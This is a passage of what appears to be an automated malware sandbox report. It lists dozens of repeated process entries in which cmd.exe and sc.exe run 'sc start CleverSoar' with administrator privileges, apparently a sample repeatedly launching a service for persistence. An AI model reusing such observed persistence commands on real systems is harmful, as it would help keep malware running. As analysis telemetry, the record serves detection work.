                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:39
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:40
                          Start time:21:42:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:41
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:42
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:43
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:44
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:45
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:46
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:47
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:48
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:49
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:50
                          Start time:21:42:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:51
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:52
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:54
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:55
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:56
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:57
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:58
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:59
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:60
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:61
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:62
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:63
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:64
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:65
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:66
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:67
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:68
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:69
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:70
                          Start time:21:42:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:71
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:72
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:73
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:74
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:75
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:76
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:77
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:78
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:79
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:80
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:81
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:82
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:83
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:84
                          Start time:21:42:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:85
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:86
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:87
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:88
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:89
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:90
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:91
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:92
                          Start time:21:42:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:93
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:94
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:95
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:96
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:97
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:98
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:99
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:100
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:101
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:102
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:103
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:104
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:105
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:106
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:107
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:108
                          Start time:21:42:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
